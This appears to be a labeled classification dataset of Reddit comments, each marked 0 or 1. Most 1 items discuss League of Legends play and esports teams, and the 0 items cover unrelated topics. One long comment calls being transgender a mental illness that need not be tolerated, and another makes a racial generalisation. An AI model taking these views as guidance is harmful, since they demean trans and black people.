1	I really hate how players want everything to be available. It takes you literally a half second to check what damage your smite deals. You've more than enough time to do that while running to drake anyway. Also it's something that people know. It's a great addition, but I dont think it's that huge of a thing.
0	Allow me to respond with a daily random sampling of the top ten posts from /r/atheism:     [What the actual fuck...?]( A religious person being dumb. I don't see why it's an asshole move to call this out as a WTF.   [A joke my dad told me today]( -- kind of a stretch to call this mocking religion, could be told by a religious person, not being an asshole.   [Fuck off, Jesus]( Possibly an asshole. I have to imagine I'd find this funny even as a believer, though.   [God doesn't exist]( -- a depressing comic. Don't see how this is being an asshole to anyone other than himself.   [I thought this debate was done already]( -- nope, if anything, the flat-earthers are being assholes to themselves. Or trolling everyone else, hard to tell.   [Stephen Fry on Proof]( -- more a skeptic thing than anything else. Both of them laughed, so, nope, not an asshole.   [Good Guy William Tyndale]( -- Huh, TIL. Again, I have to imagine religious people would agree.   [So, my friend went to a rally]( -- yep, ok, I can see that as an asshole -- though still hilarious.   [Atheists united at the aids walk]( -- OP, as a mild-mannered atheist, should approve of this one!   [My friend is a genius (why Megatron is superior to God)]( -- asshole, and still funny.     So this time, I count 3, 8, and 10 as assholes. 3 out of the top 10, and two of them were way down. I suppose it's subjective, but I'd argue I'm being generous here, and it's actually none -- 3, 8, and 10 are all  funny.  Genuinely funny, or at worst lame. Not mean-spirited.   For a fair comparison, how about /r/AdviceAnimals lately?     This post. Borderline, I'll let it slide.   [Undercover Sheep](   [Every time I go to the doctor]( -- implies nursing staff are liars. Asshole.   This feature needs to go  to whoever the girl was.   [As a shy guy, this annoys me]( -- borderline, I'll let it slide. I don't think "why the fuck" is enough to make it an asshole.   [Good Guy Joe Kittinger]( -- not an asshole.   [10 Goat]( -- asshole to /r/trees, or possibly to an individual high person who said this.   [Brave Felix]( -- not actually an asshole, though a bit irritating as I vaguely remember this being an image from a different jump.   [Sheltering Suburban Mom]( -- not wrong, just an asshole.   [I can't be the only one thinking this...]( -- not an asshole.     So I'm counting 3, 4, 7, and 9 as asshole posts. What's more, the clearest "Yep, that's an asshole" are at 3 and 4, assuming I'm not counting this post at 1.
1	The way how I managed to crawl out was I spammed only one champion, which was Thresh. How did I improve? Best thing that I did was also when I grouped normals with my plat/gold friends was after each teamfight, doesn't matter if we won it or lost it, broke it down as to what went good and what went bad and proceeded on from there.   I like what the top comment said as well "learn from outside of ranked as much as possible." For real, learning Thresh I watched Xpecial, Aphro, and Zekent play for a long time. I studied how they moved, when they warded, engaging/disengaging, peeling, etc. This doesn't mean "VOYBOY PLAYED AP YASUO MUST TRY THIS LELELE" No. Don't copy their builds or attempt their next level plays because that shit doesn't work every time. That's one play out of a million that will, most likely, not be replicated again. Just study their movements, the game flow and the calls being sent out (when to baron/drag, ganks, etc) and just take notes and apply it to normals first.   That's all I got
1	because allstars actually fucking matters, if it was a for fun tournament just to show the favorites going head to head then sure who cares but last year europe got screwed over so hard because everyone sent half of the team that almost exclusively speaks russian and a french guy and a german. The team had 0 cohesion and likely had issues communicating since Gambit speaks russian in game and basically got shoehorned into speaking a language they were not super comfortable with.   But when worlds rolled around we saw that SEA didnt have the greatest teams to offer and that europe was an actual contender for a top 3 finish.
0	I have kept my weight pretty consistent with my pregnancies, but I need to lose weight. The issue was my pregnancies have been high risk. After each birth, I have had some issues with my health that has pretty much prevented any meaningful exercises beyond stretching. I also have a painful condition that will not get better until I have a hysterectomy (which they wouldn't do until I had one more baby). So, I got pregnant again so they would finally help me (it's not that I don't want this baby, I do, but I wish the doctors would have put my health first instead of putting my life in danger, which having this baby has done). I am just trying to figure out what I am going to do as my blood pressure is now an issue and if it doesn't go down it could mean bed rest (which seems impossible with a toddler). After my c section (it's not an option to have a natural birth) they will take out my uterus. This is going to mean a long recovery, and I will have two kids to take care of. Yes, I plan to lose weight, but it's going to be slow going. It has taken a long time to put the weight on, it will take a while to take it off. I'm sure people will judge me for it, but they are ignorant to the situation. My health comes first and I will do what my doctors say. I didn't "let myself go." In fact, I have not gained weight this pregnancy at all and will only be expected to gain some weight in my last trimester when the baby is getting bigger (maybe ten pounds). I have to watch everything I eat and I do. It kills me when women use pregnancy as an excuse to eat nothing but junk food (everything in moderation!).
1	If you look at some of the reasons other MMO's start to decline it can pretty much be based on a few things.   1.  Lack of new Content   2.  Newer games of the same genre that are competitive.   3.  Fiscal obligations.   1.   Riot releases new champs, game modes, lore updates, etc. On a near weekly basis.  This probably won't slow down considering Riot continues to grow as a company and LoL continues to be popular.  Even if they decided to branch off and begin producing a new game they would still have a dedicated team for LoL releasing new content.   New content can also be a turn off for some MMO's.  You want to feel relevant in the game.  For example, take a break from WoW or another MMORPG and they might release a new raid or dungeon.  If you are really far behind on these games then it is often hard to keep up with content, especially if you are a more casual gamer.  As a result some people lose interest in the game realizing how much work they will have to put in to accomplish the things they want to.   In contrast if we look at LoL, you can take a large break and still come back, feel relevant, and be in roughly the same spot you were when you quit.  Sure there will be new champs that you will have to learn and your elo may decay, but the game itself is relatively the same and easy to come back to.   2.   If we look at other MOBA's that are competetive with LoL at the moment we have HoN and DotA2.  HoN would have to doing something really impressive to reach the level of popularity that LoL is currently at and honestly that probably will never happen.  DotA2 on the otherhand is fairly popular but still did not cause a major impact on LoL's popularity.  Even if a person prefers one to the other you can still play all 3 because of their F2P systems (Not sure if DotA is F2P or not).  Because DotA2 was released recently and HoN seems to be content where it is, it would take an ambitious new producer to release a MOBA with the ability to sap LoL of its popularity.  To be frank, I don't see that happening anytime soon.   3.   LoL is a free to play game that uses microtransactions to make revenue.  Therefore, they don't base their income on monthly fees to play the game.  This means that a player will never have to stop playing LoL for monetary reasons.  This also makes it a lot harder to quit the game.  WoW for example if you want to quit you can just cancel your subscription and then you are prevented from playing the game.  Even if you quit LoL, the option to play it is always there and won't require money to satisfy your craving.   You also dont have to buy expansion packs for LoL.
0	I'm black and I agree with this meme. When I was a kid, I always felt really embarrassed when other black kids would act stupid and obnoxious at the local pools and ruin shit for everyone else. Honestly, this was one of the reasons I didn't go to local water parks all that much as a kid; they were always there, every goddamn time.
0	Story time.   I moved out of my parents house when I was 21 years old. I went from being very responsible the first few months to a raging alcoholic partying every weekend, like any reputable young lad would do at that age. On one occasion, a good friend of mine lost control of himself and threw up all over the bathroom. I mean everywhere; what he did could be considered a modern art masterpiece.   The next morning, I wake up very early and step over all the people laying on the floor. I felt like I was walking through a liquor-laden battlefield. I go into the bathroom, still very drunk, and realize that I need to get that bathroom cleaned immediately. I found all the cleaning supplies I could find and mixed them all in the bath tub; we're taking bleach, window cleaner, Ajax, ammonia, you name it.  All of a sudden everyone in my living room wakes up coughing and wheezing (as I am, too, scrambling to open up the windows). It was like waking up the dead. So, don't mix chemicals together. You could kill your drunk friends, along with yourself.
0	In Sheppard v. Maxwell, 384 U.S. 333 (1966), the Supreme Court ruled that the right to a public trial is not absolute   You're mis-citing this case, really really badly.   The case states that the  public's  right to know what's going on inside a trial is not absolute.  It does  not  say that a defendant doesn't have a right to a public (as opposed to secret) trial.   In the case you sought, there was  too much  publicity, and the defendant wanted there to be  less  publicity, since the mob mentality basically took over the entire town, including the jury.  So it was ruled that it didn't have a fair trial because of  too much  publicity.  The press and public didn't have an absolute right to a "public" trial.   This has nothing to do with a defendant whose trial the government is trying to make secret -- secret to him, secret to the public, secret to  everyone .
1	Same story.  I jumped in the moment I hit 30 without reading into meta, pro scene, or even basic game construction.  I was bad.  Like, I would start Vladimir with a Ruby Crystal and no pots mid lane and was surprised people bought Doran's items cause I thought they were trash.   And I'll bet I was toxic too.  Not because I hated people, but because I genuinely didn't understand why someone would do the things they did and would call them out on what I thought were terrible plays.  I didn't know how to effectively assist the team or what my role was on it.  I couldn't follow up on what they wanted done, and I didn't even have a solid sense of what needed to be done in the first place.  And considering I only ever played Vlad and would autolock him every game (cause that's what you do in blind normals and I didn't know better), I'm guessing I pissed some people off before the game even started.   ~100 games later I'd fallen down to like 900 elo.  It didn't help that I realized my terrible habits and tried to reform at the start of S3, I still had to deal with the Bronze IV (ish) community I'd surrounded myself with.  It's no wonder I believed in elo hell back then.
1	Don't be ridiculous, these warnings are automated and detect a sudden spike in reports. These reports don't even necessarily lead to a tribunal case. His teammates were probably just asshats and decided that he should get 3-4 reports that game, and that triggered the warning.
1	I don't get why people are so prone to getting butthurt. It's an online video game. What do you expect ? People will rage and curse and say stuff they would not have the courage to say face to face because they ARE SITTING BEHIND A KEYBOARD. Yes, the 13 year old, preteen, ragekiddie has just insulted you. So what ? Press the fucking mute button and move the fuck on. There's no point in going all policeman on their asses and trying to get them banned. Seriously, don't you have better things to do then consider how to respond to a mad person whom you will never, ever speak or play with again in your life ? Like maybe, just try to enjoy the game or focus on your own play and improving. Why anyone is putting this much thought and effort into curbing the rage is beyond me. Just to clarify, raging and trolling are 2 very different things. One of them ruins the game completely for all parties involved. The other is just a frustrated person venting their anger and can be easily avoided with the press of a single.fucking.button.
0	Fun story time. I'm at college and friend asks if I can help him pick up a couch from this lady on craigslist. He says he'll pay me ten bucks to do it. So we get to this lady's apartment and I'm waiting with my truck. He and another come out caring the most disgusting couch I have ever seen. We load up couch in the back of the truck, and then  it hits me. My gut releases a warning fart. Cursed methane to say 'you shouldn't have eaten that sushi today, you 2 minutes, go.' I run through my head of places to go, but I decide to ask the lady if I can use her restroom. I run up the stair to her apartment, bang on her door with sweaty palms. Every bit of my body was doing all it can to not shit myself.   I ask "guh, would it be weird if I used your restroom?" "Uh yeah?" She responded. terror washed over me and my face contorted under my self induced agony. " kidding, go right ahead" she finished. I pushed right pass her into the most disgusting place were (I'm told) people live. There was trash everywhere and rooms with blocked doorways filled with garbage. Also I'm pretty sure there was just a dead hamster just kind of laying there. The stench smelled worse than a 2 week old animal carcass. I get to her bathroom jerk the door shut, and as soon as my ass hits toilet, explosion. I have never before or since know any relief greeter than that, the only thing that comes kind of close is one time I went more than a month without jerking it or sex. Anyway after I'm done, I look around I see no toilet paper.  I went down the list of items I could use; hand no, towel no, shower curtain no. Then a light went off in my brain.   What is the one thing in a bathroom that women have fucks tons of? That's right maxi pads and tampons, I grab a big clean wad of pads. Wipe, first discovering that there is in fact a very sticky side to the pads (ripped out some hair). I finish and flush, and toilet starts to clog. I don't care, I run out to my truck and leave. That friend of mine end up having to through away that couch that day because it was so nasty. He paid 40 dollars for it. I dropped my ten somewhere., I guess that's what I get or something.
0	See we have a fundamental difference of opinion here, and I'm willing to let it lie at that. I don't think it's acceptable for a person to change their entire body beause their head isn't right. I think it's pretty obviously a mental issue.   > You have no right to determine which course of action for me is 'reasonable'   You're right, I don't. But taking the rather drastic step of  changing your entire fucking gender and lopping of your genitals  is inherently unreasonable. "Well ma, looks like I have a splinter in my finger.""That's okay honey, we'll just cut off your entire hand, you won't have to worry about that splinter anymore." Does it solve the problem? Yes. Is it reasonable? Of course not.   > This is a drastically inefficient method.   So are lots of treatments for mental issues. Do you think we have efficient treatments for schizophrenia, or addiction, or PTSD, or bi-polar disorder, or OCD, or a thousand other things? We really don't. Some of those issues have more effective treatments, some don't. But on the whole, our understanding of a lot of mental issues isn't very good, and our treatments aren't very effective. And here's the point of all that:  just because the treatments aren't effective, doesn't mean it isn't a mental disorder.  The equivalent if what you're saying is a schizophrenic saying, "well the treatments for Schizophrenia aren't very good, so everyone should just accept me this way and allow me to be out in society doing my schizophrenic thing with no help or drugs or anything, and society just has to roll with it."   So basically, you can't say it isn't a mental issue just because you don't find the treatment to be effective. And just going with your mental issue and expecting everyone to be okay with that should not be an acceptable option.   As to your last point, equating sexual orientation with being confused about your gender is a stretch to make. To be quite honest I don't think the T belongs in there with the LGB. They are entirely different things. I mean you can't equate "I like to have sex with my own gender." with "I wish to remove my genitals and replace them with a facsimile of the opposite while being injected with loads of hormones that do not occur in my body at nearly those levels nautically, if at all, and then I will undergo several surgeries in order to make it look legit." Those two statements aren't even in the same ballpark. Hell, they aren't even playing the same sport.   So, yes. I support gay rights. Dudes wanna bang dudes? Fine by me. Girls wanna bang girls? Do it up. You like both? Good for you, you just doubled your dating pool! But don't try and equate sexual orientation with Transgenderism, because I just don't see it. And again, just because the mental health treatments we have for that at present aren't as effective as you would like, doesn't make it intrinsically okay, or socially acceptable, for people to take the drastic action of gender reassignment surgery and all that. Just like its not okay for people with acute Schizophrenia to go off their meds and go crazy and make a scene in public.   As I alluded in an earlier post, your worldview of "it's my body, I can do what I want with it." is all well and good... As long as you're not trying to function as a member of a society. And our society mostly agrees with what I have said. You have to realize that just because you choose to do seething very drastic to your body, that doesn't mean that everyone has to accept it and love you and think you're a great person. Hell to be quite honest, we don't even have to tolerate it! And mist societies don't! Hell dude be lucky you don't live in say, more than half the countries in the world. And now it's not enough that we tolerate you here, we have to accept your drastic non-solution to your serious mental health problem? That's absurd, and I will do no such thing
1	For the CLG vs TL series the only reason for the bans is that TL didn't want to have to deal with his mid-game. Although, i think it was a pretty weak ban as Link under-performed in the one game he got him in the series. The difference between the series of CLG vs TL and GV vs TIP is that it looks like GV and TIP might have been scrimming with it. This is seen through TF not being banned in the first game of CLG vs TL, but thereafter his bans for the rest of the series.   I don't know how to really explain it with GV vs TIP other than the two teams had been scrimming each other and it came up as being played quite often. Currently TF isn't really a meta pick but he has good synergy with some meta picks.
0	Now see,  this  is the right way to think. Sorry for assuming you were trying to prove me wrong, you were only playing devil's advocate which was honestly what I was doing to the original commenter in the first place. I was originally attempting to show him that not only the "liberal drones"/"Democrat extremists" would go off and do something as drastic as shooting someone over something trivial.
0	My mom is loving being a grandma. She's actually a step-grandmother, but whatever. She loves looking after her common law's granddaughter so much, the little shit can be acting like a total tool and my mom is still having a blast looking after her. It's real cute.  My mom has walked out of the last i-dunno-how-many movies she took GD to because once she starts to fidget or cause a scene my mom just scoops her up and leaves. Everyone's happy.  "The trick, if you really want to do something and need to bring them along is to buy enough chocolate for them to space out. Once the chocolate's gone, you're fucked".
1	Maybe riven needs a hitbox witdh nerf? Or elitist Riven mains could stop complaining about quality of life buffs. And another thing, your #3 point is stupidly ill informed everyone knows to weave autos in-between q casts.
1	Who you choose to play shpuld be more who you like to play. But a higher kda may show that you are better with some champs. But some champs naturally gets higher kda than others. E.g . leblanc and akali who are single target assasin type champs focus on killing one target and with these you can do really good but get relatively low kda as oppose to supports like soraka who can heal a her teammates and get a lot of assist.
1	If it was halved in range, he becomes a pretty great cc heavy champ, but he punishes people who are out of position, not people who aren't constantly aware of the fact they could get grabbed over a wall into a waiting team.   He's like Nidalee in that playing against him becomes an exercise in micro managing your position, much more so than any other champs can make you do. It's not fun to play against, and "counterplay" (as riot is so in love with saying nowadays) revolves around not standing still, warding all the bushes and accepting that he will pull someone on your team late game which will make it a 4v5 and you will lose.   This isn't what any player enjoys playing against and it encourages the kind of play riot has been moving away from, conservative, overly cautious play. And playing as him? No more fun, you just keep throwing q's, and it's a matter of time till it lands and you get a guaranteed kill from the q, knockup, 30s cd aoe silence and damage and passive taht prevents countering this with just fighting.
1	Use your q to get on a minion behind him when he flamethrowers your ass and THEN stun him.  So much of rumbles damage is focused in his positioning.  If you can force him to turn with you to do damage you'll avoid a lot of it.
0	Unidan, you're one of the greatest Redditors of our generation, and could start a cult with the following you have (if you haven't, that is). No one makes biology more exciting than you!
0	I can't help but point out that by "people", bonaque is including the perpetrator.   Source: American here, that pays attention to foreign social norms.
1	My toughts on xerath. Be scared of opponent pre lvl 6, for the facking best master BAIT ever, when you make him dive your turret cuz he's a dumb nub and you stun  him and do your 500 DPS combo ult! Then he'll go afk and game is over. GG WP
0	I'll make an attempt to explain this in a dramatized story format.   I grew up in subsidized housing. The kids there don't have money. 17 years old and don't have a bank account? Common. Their clothes are all hand-me-downs or thrift shop buys. It's not even "I buy a pair of jeans for $5 when a  really  nice pair comes in". It's more like "My jeans just got torn up beyond repair this time. I don't have other pants. I need to buy the nicest pair of jeans they have there for $5 right now."   They have literally  never  worn new clothes. You know that feeling you get when you put new socks on? They don't.   But then they land a part time job processing chicken meat for $11/hr. They have a full stomach, freshly-washed clothes, and $40 in cash. That's a pretty god damn good feeling. They finally 'made it'! And they want something that's brand new for the first time in their life.   Jeans? $150. Shirt? $50. Shoes? $90. But a hat? $15.   They buy the hat and want to tell people that it's brand new. Sticker on, brim straight. Keep it like that for as long as possible because you want people to know that you've got $10 to your name and that you feel on top of the world because of it. You might be poor. But at least you're not broke.   They know it's low-brow. They know people won't respect them more because of it. They don't care. They worked hard to exceed their financial goals (helping mum pay rent on time, not having to go to the Sally-Ann or the church's food bank) and they want people to know.
1	I think they should add the timer on when you tab their score, if they recently put their trinket down or no. Yes, its gets hard ganking when the enemy gets lvl 9 (2min free ward), but by that time the laningphase has already ended. I would not recommend playing counterjunglers in S4. Shaco took all my wraiths and golems and I took like 2 of his wraiths and I came in the lead over the enemy Shaco. He was just annoying and there's no snowballing UNLESS you have your Ancient item.   I think that jungler's that have it bad early will slowly come back again. In that category belongs Amumu,Maokai,Skarner,Shen,Mundo,Trundle,Hecarim,Nautilus and Rammus cause of the new jungle changes.
1	I'm going to second this post.   Put this into perspective for you all. I've been in the "E-Sports Industry" for close to 10 years. Working and traveling for various top organizations, sponsors and agencies. I've been paid more than those placing in MLG events, at MLG. I've met hundreds of "pro players" and I've seen their dreams, and had them myself. I've played other very popular titles for close to 13-14 years of my life (casually, but still competitive and at a very high level & in numerous sponsored organizations) to know that I don't want to go "pro."   What is pro? Giving up your day job, your life, your education, to sit at home and play video games. Try to be as good as you can and if you do make it during those "primetime days" of that game, you'll reach that eternal fame in the game and make some money to live off of, but it isn't the glorious life you'd think. After 5 years, when the scene changes and old games take over new games, what are you stuck with? A life that you had, no education, and a job 5 years behind someone that started when you lived that dream (see Championship Gaming Series -  ). There are no self made millionaires (and he had a lot of help) in e-sports, ie Fatal1ty, any longer.   I don't want to discourage you from trying at all. Go ahead and make that dream a reality, just realize there are hundreds of thousands of people trying to do what you are doing in this same game, how do you differentiate yourself from them, and who do you know? That's how you'll make it. Get in with the right people and grow from there. In LoL, SoloQ may be that way, but you're taking a chance every time you hit Play to make a connection, so use it. If you make it "pro" your supporters are those that will remember they played with you, not the ones that you flamed and trolled.
1	I am a bit late to the party, but whatever.   This prediction is based on bits and pieces of information acquired from various sources, some of the information I gathered might be wrong.   I know the least about the Asian teams so let's start with them.   I have never seen Saigon Jokers play, but based on a lot of things I have picked up on Reddit and a few other sources, I don't think they have a chance of getting out of the group stage.   World Elite has seen roster changes not too long ago. And their performance in the last few tournaments hasn't been on a level where I could see them advancing past the quarter finals.   Invictus Gaming has beaten CLG.Prime online with 200 ping and I heard they are very good. But, I've also heard that, the Chinese meta, the junglers in particular, have a very small impact on the game and they rely primarily on their carries to bring the victory home. This is the opposite to western meta, where jungle presence is key and the junglers play a vital role in a team. Based on that I can't see the Chinese meta succeeding. The western junglers are too big of a threat to allow their carries to get farmed enough to carry the games.   Taipei Assassins have been regarded as the number one team in the world, based on their performance and their training regiment. But have fallen quite a long way from that since. Their fame has been almost entirely extinguished and I just can't see them starting a huge comeback at the Season 2 finals.   Najin Sword is considered the best Korean team by quite a few people, despite being behind Azubu Frost in circuit ranks. The reason for that is their flexibility, which Frost has not been able to show until now. Nhat Nguyen said a very interesting thing on SotL: Azubu Frost has only participated in Korean tournaments, which take place over the course of weeks with a lot of preparation time between matches, and they always know who to prepare for. This is an entirely different concept than the majority of the western tournaments have. You have to play a lot of consecutive matches in one day, against a variety of different teams. And I don't know if Frost has the flexibility to handle this situation, because up until now, they didn't have to.   CLG.Primes tournament performance in Season 2 was not the best they hoped it to be. They have struggled against Korean teams and seemingly didn't improve during their time there, because despite all the training, they are still second to TSM in their region. They have also struggled against Dignitas at the S2 NA Regionals, with one of the longest games in Season 2 LANs, suffering a 0:2 defeat. TSM then proceeded to obliterate Dignitas in the finals. CLG.Eu also has a notch above their North American counterpart and we will see if the training of these two teams will pay off in the end, based on how much they are streaming, I'm not so sure.   TSM could bring home a first place at every LAN event they attended, since they replaced TheRainMan with Dyrus, there is no doubt they are the strongest NA team. However, their showing against Azubu Blaze who failed to qualify for the finals against Najin Sword, suffering a 0:5 defeat, makes it hard to see whether or not they have prepared for the Korean and EU teams, who they themself say are ahead of the NA scene.   SK Gaming may have the most popular and prominent player in the world, but they still couldn't achieve even one victory in a LAN environent in the history of the team, with a lot of lineup changes over the course of Season 2, they seem to finally have a team that could potentially have a bigger impact at the Season 2 finaly than people are willing to give them credit for. They convincingly beat CLG.Eu at the European Regionals 2:0, which nobody expected. But then got absolutely destroyed in the finals by Moscow 5.   CLG.Eu is a very strong team, they have proven themselves against Europes best and grabbed a second place on their first attendance at the OGN Summer championships. I have not seen the matches, but from what I gather, they could have come out ahead, were it not for silly mistakes. They were ahead of Azubu Frost 2:0, but couldn't bring their A game in the rest of the matches and ultimately lost 2:3 to Frost in the finals.   Which brings us to M5. They are the clear favourites of the finals. No other team is solely responsible for quite so many tweaks and changes to the meta than this team. They alone conviced Riot to nerf champions who were regarded as weak by other teams previous to M5's showing. They took every other attending team by surprise at their debut in Kiev. With innovative counterjungling strategies and level one buffs on laning champions they have secured convincing victories accross two IEM events losing only one game to TSM. They hit a bump at Dreamhack against CLG.Eu but reclaimed their spot as the #1 EU team at ECC Poland, beating CLG.Eu in the finals despite Froggens Anivia. M5 is the team to beat at the finals and I am quite certain that they will be in the Season 2 finals come October 13th.   Based on recent tournament results and other sources: M5 > CLG.Eu > Najin Sword > SK > Azubu Frost > TSM.
0	I claimed ~7 years experience on my resume for calling bingo a couple hours a week every Wednesday at a local "luxury" nursing home. I got really close to that group, and they were always punctual, friendly faces who always had the best stories! If you're going into medicine or psychology, it definitely helps. You learn a lot about the frustrations and fears that come with getting older, including depression, grief, and how people cope with it those feelings.   Related story: This is going to sound a little weird, but you'll never know the emptiness and loneliness that accompanies an extended stay in a "luxury" nursing home. I volunteered at this home from the ages of 12-19, and I was the only Bingo caller that they had during that time. Even if I called in advance in the case that I was sick, had to study for a test, or notified the program director that I would be leaving town for a few days there just simply wasn't anyone to replace me.   The only reason that I even stopped was because the last woman from the original group died a couple years ago at the ripe old age of 97. Honestly, I couldn't handle the loss that time and I quit the week after it happened. She was my favorite, and I always made it a point to visit with her. She always made me feel better on my shittiest day, and I always tried to help her out whenever she was down, too. I believe her son only visited about 6 or 7 times during the first five years that I volunteered there. At most twice a year. It wasn't until it was very close to the end that he finally started to come around and actually bring the family with him. I think she was the most emotional during this period of time. That last fall had broken the other hip, which forced her into the wheelchair for good. It wasn't long afterwards that she fell into a deep depression coupled with grief over her disability. I would wheel her back to her room after bingo, and she'd start to bawl; however, I will always remember her as she was before the accident. She was sharp, funny, and her name was Mrs. Celia. I miss her dearly.   In summary, you can gain a lot of life experience volunteering for what only seems like a couple hours a week. It's experiences like this that will change your own life, the lives of others, and may even impress an interviewer one day because you took the time to do that instead of something fleeting.
1	Firstly, many of those victories were under leaders who were not actually french (Napoleon was born in Italian Corsica).   Secondly, Vietnam is like the only country to have fought in at least one major war and to have never lost.   Thirdly the colours red white and blue are used by so many countries that this point is so stupid. UK, Russia, Fiji, Australia, Iceland, Thailand, Taiwan (RoC), Costa Rica, Cuba, Netherlands, Croatia, Czech Rpbc, Dominican Rpbc, Laos, Liberia, Luxembourg, New Zealand, Nepal, North Korea, Norway, Panama, Paraguay, Samoa, Sabah, Slovakia and Slovenia all use the RWB colour scheme IN ADDITION to France and considering that America was originally a colony of England it is highly unlikely that they took those colours ESPECIALLY since, and this is the most important point   France's revolution, which resulted in the current flag pattern, happened AFTER the American revolution. In fact, many historians believe that the American revolution was one of the causes of the French revolution since it planted the idea of usurping an oppressive gov't.
1	Snake is as good as King and have much more potential in long term, considering they are very young (fan2fan and Flandre, adc and top, are 15 y.o). Not to mention that PDD is part-time coaching Snake, dude might be somewhat lazy for a pro player, but hes very smart and experienced.   Snake right now is as good as King, if not better, im not sure since ivent seen them lately, but their top laner was MVP of last LSPL split, a monster in top lane, 600LP in KR challenger, totally carry-type which you can ban out all his champions (fizz-yasuo-riven-jax-lissandra and the patch champions). SNake in long term will have more impact than King IMO.   EP is a team that was just a step behind King-Snake in the past months, but they were very good aswel, showed that deserve to be in LPL, mostly their jungler, who is the most skilled mechanically leesin ive ever seen and is somewhat experienced, played lpl with YG in s3. The thing is, They acquired STYZ after he was banned in LGD, and STYZ was banned for 6 months, which means that in december his ban will be lift already and a top5 adc in China will be back to competitive scene. Which is great, because EP's adc was the worst member in the team. EP also has a hell lot of potential in long term, Mid-Top showed to be good enough for lpl, Jungler-styz showed to be top5 in their position and they have good environment, including a great sister team to practice. Their sister team will try to qualify for LPL in a qualifer tournaments after worlds, they might do it or not, they are ok overall but have a absolute monster top laner, probably top5 in China like Snake's Flandre.   Considering current level these teams are obviously lpl and snake-king could any day be top4 taking games out of edg-shrc. COnsidering long-term potential, these 3 have potential to become a top3 teams in the scene.   After EP in lspl, the best team is WOA which has 3 good players but the team isnt actually big deal, they will probably get regalated if qualify for lpl. After WOA, no team is actually top8 teams in the scene, BUT the thing is that many players are lpl level. Many players could be stars in the scene even if their team are not that great. Weiless-Cola-Diangun showed it, they werent even top2 in their position when they played lspl (earlier s4) and still did amazingly in LPL, i can only imagine what Cherish-300-eimi-V and these top lspl players in that time would be in LPL if they qualified, they would be carrying their teams to worlds right now. In these lspl split that just ended is no different, there are many players from mid-table teams that would be great in LPL.   After EP-King-Snake, the best non-lpl teams are 2 amateur teams, that arent even in LSPL, they just play online tournaments and will try to qualify for LSPL for season 5.  They are EDG.f (edg secondary team, formed 2-3 months ago) and Team MD.   EDG.f not just has the same environment from EDG, inlcuding coaches, pc, practice partners (including korean teams) but also are a young team with 2 korean sololaners. Baeme (famous kr challenger, one of faker's rival' and brother of daydream) and the toplaner which is known as 'ray', who IMO is the best player in the team. EDG.f  showed to be insane in their first tournament with 2-3 months of practice, mostly Their toplaner and their jungler. They took games off King, 2-0ed YG easily and showed amazing mechanics. This team hard to imagine that wont be in LPL until late s5, they still have to qualify to LSPL, play LSPL and then qualify for LPL, even tho they look like a bottom lpl team already even being so new, at least better than yg-we-we.a.   MD is a bizarre team (better than edg.f) that was made by only-challenger players and in the past 3-4 months took games and won full bo3-5 series against SEVERAL lpl teams. I really mean SEVERAL, probably ALL them, took games from edg, omg, shrc, 2-0ed we.a and yg in xcs and many more impressive results. Their midlaner is the #1 in chinese challenger (Angelbeats) and  is probably better than any midlaner in this lspl that just ended. MD would probably be as good or better than EP in lspl and certainly are a lpl level team. The thing is, like EDG.f they will only be able to play in LPL in late s5 considering they arent even in lspl. UNLESS they buy a spot.   Besides MD-EDG.f-King-SNake-EP, there are also good-promissing teams like Ray Union (who 2-0ed SHRC and 2-0ed lgd twice, had many other impressive results aswel), WOA (as i said above), Gamtee (i never like them that much, not really an entertaining team to watch, but they get good results, including taking games from omg-edg), QQvip  (AKA Hangongclub, biggest Crossfire team in the world, they failed to qualify for LSPL even tho they were as good as snake in the qualifiers), vgs (were formed to be the challenger allstar team, with 4 lpl level players, but Tabe is a terrible coach and swapped 1 player that fucked the team).   All these other promissing teams (ray-woa-gamtee-qqvip-vgs) probably will never be top table lpl teams or anything like that, but they are an improvement compared to YG (not compared to we.a, we.a is playing much better lately than yg or we main team). Even if they dont reach LPL as a team, they have 2-4 players in their roster than are lpl level players, i know them very well.     I might be proved wrong someday, but my theory is that challenger-amateur teams in China are as good if not better than challenger-amateur teams in Korea, considering the size of playerbase and the terrible influx talent happening in China, stacking talent in the lower leagues instead of pushing them into top competition. At the moment, i like to follow them more than LPL, is more entertaining to watch teams rising and surprising likes of EDG-SHRC than anything else.
1	There is only one right point and it's the 66% one.   All the other are completly wrong or are not even argument in my opinion and this is why:     Actually I am trying to go D1 playing only blitz. I did have way more then 66% winrate. Now Im D2 I struggle a bit more -26lp loose +13lp win, damn it's hard. Thx to Master Tier and btw I dont understand why they try to bring people down when they added another Tier to climb for, that should be the opposite. (I rly dunno why it's done like that I wish reddit detective could help me on this one)     The majority of the time people dont troll or afk. Use maths. You gotta often see troll feeder afker but you alawys forgot that that's not the majority of player you will be matched with. Even if that's true (but that's not true at all obviously) you still have 4 chance to have a troll/feeder/afk in your team 5 chance to have one vs you so this point isn't a good one.     Series add more stress but the reward is way higher then before so it's a fair trade tbh.     The type of rank structure (tier or not tier, series or no series) doesnt rly matter. You will be at your level no matter what.       Now here is my point of view about people complaining about the not-so-new Elo system. I feel like the majority of player complaining about it are are low/mid elo player. Well actually there is way more low/mid elo player then anything else.   People think the system is too hard. They want an easier system allowing them to climb the ladder. What if Riot does it? The majority of people will climb a bit but they will stay at the same skill level. The only thing difference will be that almost everyone will cimb a bit. Diamond and Master tier will have tons of player but the majority of the community will stay around bronze silver.   Also people forget one thing it's hardder to climb with series but it's harder to go down with this sysem too when you are in a new tier. Harder to climb but higher reward.
1	For me, I enjoy playing either solo lane, and I play three champions that can go in either lane (Zed, Jayce, and Riven). I usually actually end up getting those roles, since there are a lot of "just mid" or "just top" players who are glad to let me get the other lane. There are also a TON of adc mains, and quite a few jungle mains. In fact, I have gotten a solo lane at a better frequency than jungle when I mained jungle a few months ago.
